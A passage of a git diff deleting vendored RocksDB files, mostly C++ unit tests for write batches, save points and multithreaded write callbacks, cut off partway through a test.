-        seen += "DeleteRangeCF(" + ToString(column_family_id) + ", " +
-                begin_key.ToString() + ", " + end_key.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      if (column_family_id == 0) {
-        seen += "Merge(" + key.ToString() + ", " + value.ToString() + ")";
-      } else {
-        seen += "MergeCF(" + ToString(column_family_id) + ", " +
-                key.ToString() + ", " + value.ToString() + ")";
-      }
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override {
-      seen += "LogData(" + blob.ToString() + ")";
-    }
-    virtual Status MarkBeginPrepare() override {
-      seen += "MarkBeginPrepare()";
-      return Status::OK();
-    }
-    virtual Status MarkEndPrepare(const Slice& xid) override {
-      seen += "MarkEndPrepare(" + xid.ToString() + ")";
-      return Status::OK();
-    }
-    virtual Status MarkCommit(const Slice& xid) override {
-      seen += "MarkCommit(" + xid.ToString() + ")";
-      return Status::OK();
-    }
-    virtual Status MarkRollback(const Slice& xid) override {
-      seen += "MarkRollback(" + xid.ToString() + ")";
-      return Status::OK();
-    }
-  };
-}
-
-TEST_F(WriteBatchTest, PutNotImplemented) {
-  WriteBatch batch;
-  batch.Put(Slice("k1"), Slice("v1"));
-  ASSERT_EQ(1, batch.Count());
-  ASSERT_EQ("Put(k1, v1)@0", PrintContents(&batch));
-
-  WriteBatch::Handler handler;
-  ASSERT_OK(batch.Iterate(&handler));
-}
-
-TEST_F(WriteBatchTest, DeleteNotImplemented) {
-  WriteBatch batch;
-  batch.Delete(Slice("k2"));
-  ASSERT_EQ(1, batch.Count());
-  ASSERT_EQ("Delete(k2)@0", PrintContents(&batch));
-
-  WriteBatch::Handler handler;
-  ASSERT_OK(batch.Iterate(&handler));
-}
-
-TEST_F(WriteBatchTest, SingleDeleteNotImplemented) {
-  WriteBatch batch;
-  batch.SingleDelete(Slice("k2"));
-  ASSERT_EQ(1, batch.Count());
-  ASSERT_EQ("SingleDelete(k2)@0", PrintContents(&batch));
-
-  WriteBatch::Handler handler;
-  ASSERT_OK(batch.Iterate(&handler));
-}
-
-TEST_F(WriteBatchTest, MergeNotImplemented) {
-  WriteBatch batch;
-  batch.Merge(Slice("foo"), Slice("bar"));
-  ASSERT_EQ(1, batch.Count());
-  ASSERT_EQ("Merge(foo, bar)@0", PrintContents(&batch));
-
-  WriteBatch::Handler handler;
-  ASSERT_OK(batch.Iterate(&handler));
-}
-
-TEST_F(WriteBatchTest, Blob) {
-  WriteBatch batch;
-  batch.Put(Slice("k1"), Slice("v1"));
-  batch.Put(Slice("k2"), Slice("v2"));
-  batch.Put(Slice("k3"), Slice("v3"));
-  batch.PutLogData(Slice("blob1"));
-  batch.Delete(Slice("k2"));
-  batch.SingleDelete(Slice("k3"));
-  batch.PutLogData(Slice("blob2"));
-  batch.Merge(Slice("foo"), Slice("bar"));
-  ASSERT_EQ(6, batch.Count());
-  ASSERT_EQ(
-      "Merge(foo, bar)@5"
-      "Put(k1, v1)@0"
-      "Delete(k2)@3"
-      "Put(k2, v2)@1"
-      "SingleDelete(k3)@4"
-      "Put(k3, v3)@2",
-      PrintContents(&batch));
-
-  TestHandler handler;
-  batch.Iterate(&handler);
-  ASSERT_EQ(
-      "Put(k1, v1)"
-      "Put(k2, v2)"
-      "Put(k3, v3)"
-      "LogData(blob1)"
-      "Delete(k2)"
-      "SingleDelete(k3)"
-      "LogData(blob2)"
-      "Merge(foo, bar)",
-      handler.seen);
-}
-
-TEST_F(WriteBatchTest, PrepareCommit) {
-  WriteBatch batch;
-  WriteBatchInternal::InsertNoop(&batch);
-  batch.Put(Slice("k1"), Slice("v1"));
-  batch.Put(Slice("k2"), Slice("v2"));
-  batch.SetSavePoint();
-  WriteBatchInternal::MarkEndPrepare(&batch, Slice("xid1"));
-  Status s = batch.RollbackToSavePoint();
-  ASSERT_EQ(s, Status::NotFound());
-  WriteBatchInternal::MarkCommit(&batch, Slice("xid1"));
-  WriteBatchInternal::MarkRollback(&batch, Slice("xid1"));
-  ASSERT_EQ(2, batch.Count());
-
-  TestHandler handler;
-  batch.Iterate(&handler);
-  ASSERT_EQ(
-      "MarkBeginPrepare()"
-      "Put(k1, v1)"
-      "Put(k2, v2)"
-      "MarkEndPrepare(xid1)"
-      "MarkCommit(xid1)"
-      "MarkRollback(xid1)",
-      handler.seen);
-}
-
-// It requires more than 30GB of memory to run the test. With single memory
-// allocation of more than 30GB.
-// Not all platform can run it. Also it runs a long time. So disable it.
-TEST_F(WriteBatchTest, DISABLED_ManyUpdates) {
-  // Insert key and value of 3GB and push total batch size to 12GB.
-  static const size_t kKeyValueSize = 4u;
-  static const uint32_t kNumUpdates = 3 << 30;
-  std::string raw(kKeyValueSize, 'A');
-  WriteBatch batch(kNumUpdates * (4 + kKeyValueSize * 2) + 1024u);
-  char c = 'A';
-  for (uint32_t i = 0; i < kNumUpdates; i++) {
-    if (c > 'Z') {
-      c = 'A';
-    }
-    raw[0] = c;
-    raw[raw.length() - 1] = c;
-    c++;
-    batch.Put(raw, raw);
-  }
-
-  ASSERT_EQ(kNumUpdates, batch.Count());
-
-  struct NoopHandler : public WriteBatch::Handler {
-    uint32_t num_seen = 0;
-    char expected_char = 'A';
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      EXPECT_EQ(kKeyValueSize, key.size());
-      EXPECT_EQ(kKeyValueSize, value.size());
-      EXPECT_EQ(expected_char, key[0]);
-      EXPECT_EQ(expected_char, value[0]);
-      EXPECT_EQ(expected_char, key[kKeyValueSize - 1]);
-      EXPECT_EQ(expected_char, value[kKeyValueSize - 1]);
-      expected_char++;
-      if (expected_char > 'Z') {
-        expected_char = 'A';
-      }
-      ++num_seen;
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                  const Slice& key) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override { ADD_FAILURE(); }
-    virtual bool Continue() override { return num_seen < kNumUpdates; }
-  } handler;
-
-  batch.Iterate(&handler);
-  ASSERT_EQ(kNumUpdates, handler.num_seen);
-}
-
-// The test requires more than 18GB memory to run it, with single memory
-// allocation of more than 12GB. Not all the platform can run it. So disable it.
-TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) {
-  // Insert key and value of 3GB and push total batch size to 12GB.
-  static const size_t kKeyValueSize = 3221225472u;
-  std::string raw(kKeyValueSize, 'A');
-  WriteBatch batch(size_t(12884901888ull + 1024u));
-  for (char i = 0; i < 2; i++) {
-    raw[0] = 'A' + i;
-    raw[raw.length() - 1] = 'A' - i;
-    batch.Put(raw, raw);
-  }
-
-  ASSERT_EQ(2, batch.Count());
-
-  struct NoopHandler : public WriteBatch::Handler {
-    int num_seen = 0;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      EXPECT_EQ(kKeyValueSize, key.size());
-      EXPECT_EQ(kKeyValueSize, value.size());
-      EXPECT_EQ('A' + num_seen, key[0]);
-      EXPECT_EQ('A' + num_seen, value[0]);
-      EXPECT_EQ('A' - num_seen, key[kKeyValueSize - 1]);
-      EXPECT_EQ('A' - num_seen, value[kKeyValueSize - 1]);
-      ++num_seen;
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                  const Slice& key) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override { ADD_FAILURE(); }
-    virtual bool Continue() override { return num_seen < 2; }
-  } handler;
-
-  batch.Iterate(&handler);
-  ASSERT_EQ(2, handler.num_seen);
-}
-
-TEST_F(WriteBatchTest, Continue) {
-  WriteBatch batch;
-
-  struct Handler : public TestHandler {
-    int num_seen = 0;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      ++num_seen;
-      return TestHandler::PutCF(column_family_id, key, value);
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      ++num_seen;
-      return TestHandler::DeleteCF(column_family_id, key);
-    }
-    virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                  const Slice& key) override {
-      ++num_seen;
-      return TestHandler::SingleDeleteCF(column_family_id, key);
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      ++num_seen;
-      return TestHandler::MergeCF(column_family_id, key, value);
-    }
-    virtual void LogData(const Slice& blob) override {
-      ++num_seen;
-      TestHandler::LogData(blob);
-    }
-    virtual bool Continue() override { return num_seen < 5; }
-  } handler;
-
-  batch.Put(Slice("k1"), Slice("v1"));
-  batch.Put(Slice("k2"), Slice("v2"));
-  batch.PutLogData(Slice("blob1"));
-  batch.Delete(Slice("k1"));
-  batch.SingleDelete(Slice("k2"));
-  batch.PutLogData(Slice("blob2"));
-  batch.Merge(Slice("foo"), Slice("bar"));
-  batch.Iterate(&handler);
-  ASSERT_EQ(
-      "Put(k1, v1)"
-      "Put(k2, v2)"
-      "LogData(blob1)"
-      "Delete(k1)"
-      "SingleDelete(k2)",
-      handler.seen);
-}
-
-TEST_F(WriteBatchTest, PutGatherSlices) {
-  WriteBatch batch;
-  batch.Put(Slice("foo"), Slice("bar"));
-
-  {
-    // Try a write where the key is one slice but the value is two
-    Slice key_slice("baz");
-    Slice value_slices[2] = { Slice("header"), Slice("payload") };
-    batch.Put(SliceParts(&key_slice, 1),
-              SliceParts(value_slices, 2));
-  }
-
-  {
-    // One where the key is composite but the value is a single slice
-    Slice key_slices[3] = { Slice("key"), Slice("part2"), Slice("part3") };
-    Slice value_slice("value");
-    batch.Put(SliceParts(key_slices, 3),
-              SliceParts(&value_slice, 1));
-  }
-
-  WriteBatchInternal::SetSequence(&batch, 100);
-  ASSERT_EQ("Put(baz, headerpayload)@101"
-            "Put(foo, bar)@100"
-            "Put(keypart2part3, value)@102",
-            PrintContents(&batch));
-  ASSERT_EQ(3, batch.Count());
-}
-
-namespace {
-class ColumnFamilyHandleImplDummy : public ColumnFamilyHandleImpl {
- public:
-  explicit ColumnFamilyHandleImplDummy(int id)
-      : ColumnFamilyHandleImpl(nullptr, nullptr, nullptr), id_(id) {}
-  uint32_t GetID() const override { return id_; }
-  const Comparator* GetComparator() const override {
-    return BytewiseComparator();
-  }
-
- private:
-  uint32_t id_;
-};
-}  // namespace anonymous
-
-TEST_F(WriteBatchTest, ColumnFamiliesBatchTest) {
-  WriteBatch batch;
-  ColumnFamilyHandleImplDummy zero(0), two(2), three(3), eight(8);
-  batch.Put(&zero, Slice("foo"), Slice("bar"));
-  batch.Put(&two, Slice("twofoo"), Slice("bar2"));
-  batch.Put(&eight, Slice("eightfoo"), Slice("bar8"));
-  batch.Delete(&eight, Slice("eightfoo"));
-  batch.SingleDelete(&two, Slice("twofoo"));
-  batch.DeleteRange(&two, Slice("3foo"), Slice("4foo"));
-  batch.Merge(&three, Slice("threethree"), Slice("3three"));
-  batch.Put(&zero, Slice("foo"), Slice("bar"));
-  batch.Merge(Slice("omom"), Slice("nom"));
-
-  TestHandler handler;
-  batch.Iterate(&handler);
-  ASSERT_EQ(
-      "Put(foo, bar)"
-      "PutCF(2, twofoo, bar2)"
-      "PutCF(8, eightfoo, bar8)"
-      "DeleteCF(8, eightfoo)"
-      "SingleDeleteCF(2, twofoo)"
-      "DeleteRangeCF(2, 3foo, 4foo)"
-      "MergeCF(3, threethree, 3three)"
-      "Put(foo, bar)"
-      "Merge(omom, nom)",
-      handler.seen);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(WriteBatchTest, ColumnFamiliesBatchWithIndexTest) {
-  WriteBatchWithIndex batch;
-  ColumnFamilyHandleImplDummy zero(0), two(2), three(3), eight(8);
-  batch.Put(&zero, Slice("foo"), Slice("bar"));
-  batch.Put(&two, Slice("twofoo"), Slice("bar2"));
-  batch.Put(&eight, Slice("eightfoo"), Slice("bar8"));
-  batch.Delete(&eight, Slice("eightfoo"));
-  batch.SingleDelete(&two, Slice("twofoo"));
-  batch.DeleteRange(&two, Slice("twofoo"), Slice("threefoo"));
-  batch.Merge(&three, Slice("threethree"), Slice("3three"));
-  batch.Put(&zero, Slice("foo"), Slice("bar"));
-  batch.Merge(Slice("omom"), Slice("nom"));
-
-  std::unique_ptr<WBWIIterator> iter;
-
-  iter.reset(batch.NewIterator(&eight));
-  iter->Seek("eightfoo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kPutRecord, iter->Entry().type);
-  ASSERT_EQ("eightfoo", iter->Entry().key.ToString());
-  ASSERT_EQ("bar8", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kDeleteRecord, iter->Entry().type);
-  ASSERT_EQ("eightfoo", iter->Entry().key.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-
-  iter.reset(batch.NewIterator(&two));
-  iter->Seek("twofoo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kPutRecord, iter->Entry().type);
-  ASSERT_EQ("twofoo", iter->Entry().key.ToString());
-  ASSERT_EQ("bar2", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kSingleDeleteRecord, iter->Entry().type);
-  ASSERT_EQ("twofoo", iter->Entry().key.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kDeleteRangeRecord, iter->Entry().type);
-  ASSERT_EQ("twofoo", iter->Entry().key.ToString());
-  ASSERT_EQ("threefoo", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-
-  iter.reset(batch.NewIterator());
-  iter->Seek("gggg");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kMergeRecord, iter->Entry().type);
-  ASSERT_EQ("omom", iter->Entry().key.ToString());
-  ASSERT_EQ("nom", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-
-  iter.reset(batch.NewIterator(&zero));
-  iter->Seek("foo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kPutRecord, iter->Entry().type);
-  ASSERT_EQ("foo", iter->Entry().key.ToString());
-  ASSERT_EQ("bar", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kPutRecord, iter->Entry().type);
-  ASSERT_EQ("foo", iter->Entry().key.ToString());
-  ASSERT_EQ("bar", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kMergeRecord, iter->Entry().type);
-  ASSERT_EQ("omom", iter->Entry().key.ToString());
-  ASSERT_EQ("nom", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-
-  TestHandler handler;
-  batch.GetWriteBatch()->Iterate(&handler);
-  ASSERT_EQ(
-      "Put(foo, bar)"
-      "PutCF(2, twofoo, bar2)"
-      "PutCF(8, eightfoo, bar8)"
-      "DeleteCF(8, eightfoo)"
-      "SingleDeleteCF(2, twofoo)"
-      "DeleteRangeCF(2, twofoo, threefoo)"
-      "MergeCF(3, threethree, 3three)"
-      "Put(foo, bar)"
-      "Merge(omom, nom)",
-      handler.seen);
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(WriteBatchTest, SavePointTest) {
-  Status s;
-  WriteBatch batch;
-  batch.SetSavePoint();
-
-  batch.Put("A", "a");
-  batch.Put("B", "b");
-  batch.SetSavePoint();
-
-  batch.Put("C", "c");
-  batch.Delete("A");
-  batch.SetSavePoint();
-  batch.SetSavePoint();
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ(
-      "Delete(A)@3"
-      "Put(A, a)@0"
-      "Put(B, b)@1"
-      "Put(C, c)@2",
-      PrintContents(&batch));
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ(
-      "Put(A, a)@0"
-      "Put(B, b)@1",
-      PrintContents(&batch));
-
-  batch.Delete("A");
-  batch.Put("B", "bb");
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ("", PrintContents(&batch));
-
-  s = batch.RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("", PrintContents(&batch));
-
-  batch.Put("D", "d");
-  batch.Delete("A");
-
-  batch.SetSavePoint();
-
-  batch.Put("A", "aaa");
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ(
-      "Delete(A)@1"
-      "Put(D, d)@0",
-      PrintContents(&batch));
-
-  batch.SetSavePoint();
-
-  batch.Put("D", "d");
-  batch.Delete("A");
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ(
-      "Delete(A)@1"
-      "Put(D, d)@0",
-      PrintContents(&batch));
-
-  s = batch.RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ(
-      "Delete(A)@1"
-      "Put(D, d)@0",
-      PrintContents(&batch));
-
-  WriteBatch batch2;
-
-  s = batch2.RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("", PrintContents(&batch2));
-
-  batch2.Delete("A");
-  batch2.SetSavePoint();
-
-  s = batch2.RollbackToSavePoint();
-  ASSERT_OK(s);
-  ASSERT_EQ("Delete(A)@0", PrintContents(&batch2));
-
-  batch2.Clear();
-  ASSERT_EQ("", PrintContents(&batch2));
-
-  batch2.SetSavePoint();
-
-  batch2.Delete("B");
-  ASSERT_EQ("Delete(B)@0", PrintContents(&batch2));
-
-  batch2.SetSavePoint();
-  s = batch2.RollbackToSavePoint();
-  ASSERT_OK(s);
-  ASSERT_EQ("Delete(B)@0", PrintContents(&batch2));
-
-  s = batch2.RollbackToSavePoint();
-  ASSERT_OK(s);
-  ASSERT_EQ("", PrintContents(&batch2));
-
-  s = batch2.RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("", PrintContents(&batch2));
-
-  WriteBatch batch3;
-
-  s = batch3.PopSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("", PrintContents(&batch3));
-
-  batch3.SetSavePoint();
-  batch3.Delete("A");
-
-  s = batch3.PopSavePoint();
-  ASSERT_OK(s);
-  ASSERT_EQ("Delete(A)@0", PrintContents(&batch3));
-}
-
-TEST_F(WriteBatchTest, MemoryLimitTest) {
-  Status s;
-  // The header size is 12 bytes. The two Puts take 8 bytes which gives total
-  // of 12 + 8 * 2 = 28 bytes.
-  WriteBatch batch(0, 28);
-
-  ASSERT_OK(batch.Put("a", "...."));
-  ASSERT_OK(batch.Put("b", "...."));
-  s = batch.Put("c", "....");
-  ASSERT_TRUE(s.IsMemoryLimit());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/write_callback.h b/thirdparty/rocksdb/db/write_callback.h
deleted file mode 100644
index 6517a7c..0000000
--- a/thirdparty/rocksdb/db/write_callback.h
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class DB;
-
-class WriteCallback {
- public:
-  virtual ~WriteCallback() {}
-
-  // Will be called while on the write thread before the write executes.  If
-  // this function returns a non-OK status, the write will be aborted and this
-  // status will be returned to the caller of DB::Write().
-  virtual Status Callback(DB* db) = 0;
-
-  // return true if writes with this callback can be batched with other writes
-  virtual bool AllowWriteBatching() = 0;
-};
-
-}  //  namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_callback_test.cc b/thirdparty/rocksdb/db/write_callback_test.cc
deleted file mode 100644
index d2bf30a..0000000
--- a/thirdparty/rocksdb/db/write_callback_test.cc
+++ /dev/null
@@ -1,397 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-#include <functional>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "db/write_callback.h"
-#include "rocksdb/db.h"
-#include "rocksdb/write_batch.h"
-#include "port/port.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-using std::string;
-
-namespace rocksdb {
-
-class WriteCallbackTest : public testing::Test {
- public:
-  string dbname;
-
-  WriteCallbackTest() {
-    dbname = test::TmpDir() + "/write_callback_testdb";
-  }
-};
-
-class WriteCallbackTestWriteCallback1 : public WriteCallback {
- public:
-  bool was_called = false;
-
-  Status Callback(DB *db) override {
-    was_called = true;
-
-    // Make sure db is a DBImpl
-    DBImpl* db_impl = dynamic_cast<DBImpl*> (db);
-    if (db_impl == nullptr) {
-      return Status::InvalidArgument("");
-    }
-
-    return Status::OK();
-  }
-
-  bool AllowWriteBatching() override { return true; }
-};
-
-class WriteCallbackTestWriteCallback2 : public WriteCallback {
- public:
-  Status Callback(DB *db) override {
-    return Status::Busy();
-  }
-  bool AllowWriteBatching() override { return true; }
-};
-
-class MockWriteCallback : public WriteCallback {
- public:
-  bool should_fail_ = false;
-  bool allow_batching_ = false;
-  std::atomic<bool> was_called_{false};
-
-  MockWriteCallback() {}
-
-  MockWriteCallback(const MockWriteCallback& other) {
-    should_fail_ = other.should_fail_;
-    allow_batching_ = other.allow_batching_;
-    was_called_.store(other.was_called_.load());
-  }
-
-  Status Callback(DB* db) override {
-    was_called_.store(true);
-    if (should_fail_) {
-      return Status::Busy();
-    } else {
-      return Status::OK();
-    }
-  }
-
-  bool AllowWriteBatching() override { return allow_batching_; }
-};
-
-TEST_F(WriteCallbackTest, WriteWithCallbackTest) {
-  struct WriteOP {
-    WriteOP(bool should_fail = false) { callback_.should_fail_ = should_fail; }
-
-    void Put(const string& key, const string& val) {
-      kvs_.push_back(std::make_pair(key, val));
-      write_batch_.Put(key, val);
-    }
-
-    void Clear() {
-      kvs_.clear();
-      write_batch_.Clear();
-      callback_.was_called_.store(false);
-    }
-
-    MockWriteCallback callback_;
-    WriteBatch write_batch_;
-    std::vector<std::pair<string, string>> kvs_;
-  };
-
-  // In each scenario we'll launch multiple threads to write.
-  // The size of each array equals to number of threads, and
-  // each boolean in it denote whether callback of corresponding
-  // thread should succeed or fail.
-  std::vector<std::vector<WriteOP>> write_scenarios = {
-      {true},
-      {false},
-      {false, false},
-      {true, true},
-      {true, false},
-      {false, true},
-      {false, false, false},
-      {true, true, true},
-      {false, true, false},
-      {true, false, true},
-      {true, false, false, false, false},
-      {false, false, false, false, true},
-      {false, false, true, false, true},
-  };
-
-  for (auto& two_queues : {true, false}) {
-    for (auto& allow_parallel : {true, false}) {
-      for (auto& allow_batching : {true, false}) {
-        for (auto& enable_WAL : {true, false}) {
-          for (auto& enable_pipelined_write : {true, false}) {
-            for (auto& write_group : write_scenarios) {
-              Options options;
-              options.create_if_missing = true;
-              options.allow_concurrent_memtable_write = allow_parallel;
-              options.enable_pipelined_write = enable_pipelined_write;
-              options.concurrent_prepare = two_queues;
-
-              ReadOptions read_options;
-              DB* db;
-              DBImpl* db_impl;
-
-              DestroyDB(dbname, options);
-              ASSERT_OK(DB::Open(options, dbname, &db));
-
-              db_impl = dynamic_cast<DBImpl*>(db);
-              ASSERT_TRUE(db_impl);
-
-              // Writers that have called JoinBatchGroup.
-              std::atomic<uint64_t> threads_joining(0);
-              // Writers that have linked to the queue
-              std::atomic<uint64_t> threads_linked(0);
-              // Writers that pass WriteThread::JoinBatchGroup:Wait sync-point.
-              std::atomic<uint64_t> threads_verified(0);
-
-              std::atomic<uint64_t> seq(db_impl->GetLatestSequenceNumber());
-              ASSERT_EQ(db_impl->GetLatestSequenceNumber(), 0);
-
-              rocksdb::SyncPoint::GetInstance()->SetCallBack(
-                  "WriteThread::JoinBatchGroup:Start", [&](void*) {
-                    uint64_t cur_threads_joining = threads_joining.fetch_add(1);
-                    // Wait for the last joined writer to link to the queue.
-                    // In this way the writers link to the queue one by one.
-                    // This allows us to confidently detect the first writer
-                    // who increases threads_linked as the leader.
-                    while (threads_linked.load() < cur_threads_joining) {
-                    }
-                  });
-
-              // Verification once writers call JoinBatchGroup.
-              rocksdb::SyncPoint::GetInstance()->SetCallBack(
-                  "WriteThread::JoinBatchGroup:Wait", [&](void* arg) {
-                    uint64_t cur_threads_linked = threads_linked.fetch_add(1);
-                    bool is_leader = false;
-                    bool is_last = false;
-
-                    // who am i
-                    is_leader = (cur_threads_linked == 0);
-                    is_last = (cur_threads_linked == write_group.size() - 1);
-
-                    // check my state
-                    auto* writer = reinterpret_cast<WriteThread::Writer*>(arg);
-
-                    if (is_leader) {
-                      ASSERT_TRUE(writer->state ==
-                                  WriteThread::State::STATE_GROUP_LEADER);
-                    } else {
-                      ASSERT_TRUE(writer->state ==
-                                  WriteThread::State::STATE_INIT);
-                    }
-
-                    // (meta test) the first WriteOP should indeed be the first
-                    // and the last should be the last (all others can be out of
-                    // order)
-                    if (is_leader) {
-                      ASSERT_TRUE(writer->callback->Callback(nullptr).ok() ==
-                                  !write_group.front().callback_.should_fail_);
-                    } else if (is_last) {
-                      ASSERT_TRUE(writer->callback->Callback(nullptr).ok() ==
-                                  !write_group.back().callback_.should_fail_);
-                    }
-
-                    threads_verified.fetch_add(1);
-                    // Wait here until all verification in this sync-point
-                    // callback finish for all writers.
-                    while (threads_verified.load() < write_group.size()) {
-                    }
-                  });
-
-              rocksdb::SyncPoint::GetInstance()->SetCallBack(
-                  "WriteThread::JoinBatchGroup:DoneWaiting", [&](void* arg) {
-                    // check my state
-                    auto* writer = reinterpret_cast<WriteThread::Writer*>(arg);
-
-                    if (!allow_batching) {
-                      // no batching so everyone should be a leader
-                      ASSERT_TRUE(writer->state ==
-                                  WriteThread::State::STATE_GROUP_LEADER);
-                    } else if (!allow_parallel) {
-                      ASSERT_TRUE(writer->state ==
-                                      WriteThread::State::STATE_COMPLETED ||
-                                  (enable_pipelined_write &&
-                                   writer->state ==
-                                       WriteThread::State::
-                                           STATE_MEMTABLE_WRITER_LEADER));
-                    }
-                  });
-
-              std::atomic<uint32_t> thread_num(0);
-              std::atomic<char> dummy_key(0);
-
-              // Each write thread create a random write batch and write to DB
-              // with a write callback.
-              std::function<void()> write_with_callback_func = [&]() {
-                uint32_t i = thread_num.fetch_add(1);
-                Random rnd(i);
-
-                // leaders gotta lead
-                while (i > 0 && threads_verified.load() < 1) {
-                }
-
-                // loser has to lose
-                while (i == write_group.size() - 1 &&
-                       threads_verified.load() < write_group.size() - 1) {
-                }
-
-                auto& write_op = write_group.at(i);
-                write_op.Clear();
-                write_op.callback_.allow_batching_ = allow_batching;
-
-                // insert some keys
-                for (uint32_t j = 0; j < rnd.Next() % 50; j++) {
-                  // grab unique key
-                  char my_key = dummy_key.fetch_add(1);
-
-                  string skey(5, my_key);
-                  string sval(10, my_key);
-                  write_op.Put(skey, sval);
-
-                  if (!write_op.callback_.should_fail_) {
-                    seq.fetch_add(1);
-                  }
-                }
-
-                WriteOptions woptions;
-                woptions.disableWAL = !enable_WAL;
-                woptions.sync = enable_WAL;
-                Status s = db_impl->WriteWithCallback(
-                    woptions, &write_op.write_batch_, &write_op.callback_);
-
-                if (write_op.callback_.should_fail_) {
-                  ASSERT_TRUE(s.IsBusy());
-                } else {
-                  ASSERT_OK(s);
-                }
-              };
-
-              rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-              // do all the writes
-              std::vector<port::Thread> threads;
-              for (uint32_t i = 0; i < write_group.size(); i++) {
-                threads.emplace_back(write_with_callback_func);
-              }
-              for (auto& t : threads) {
-                t.join();
-              }
-
-              rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-              // check for keys
-              string value;
-              for (auto& w : write_group) {
-                ASSERT_TRUE(w.callback_.was_called_.load());
-                for (auto& kvp : w.kvs_) {
-                  if (w.callback_.should_fail_) {
-                    ASSERT_TRUE(
-                        db->Get(read_options, kvp.first, &value).IsNotFound());
-                  } else {
-                    ASSERT_OK(db->Get(read_options, kvp.first, &value));
-                    ASSERT_EQ(value, kvp.second);
-                  }
-                }
-              }
-
-              ASSERT_EQ(seq.load(), db_impl->GetLatestSequenceNumber());
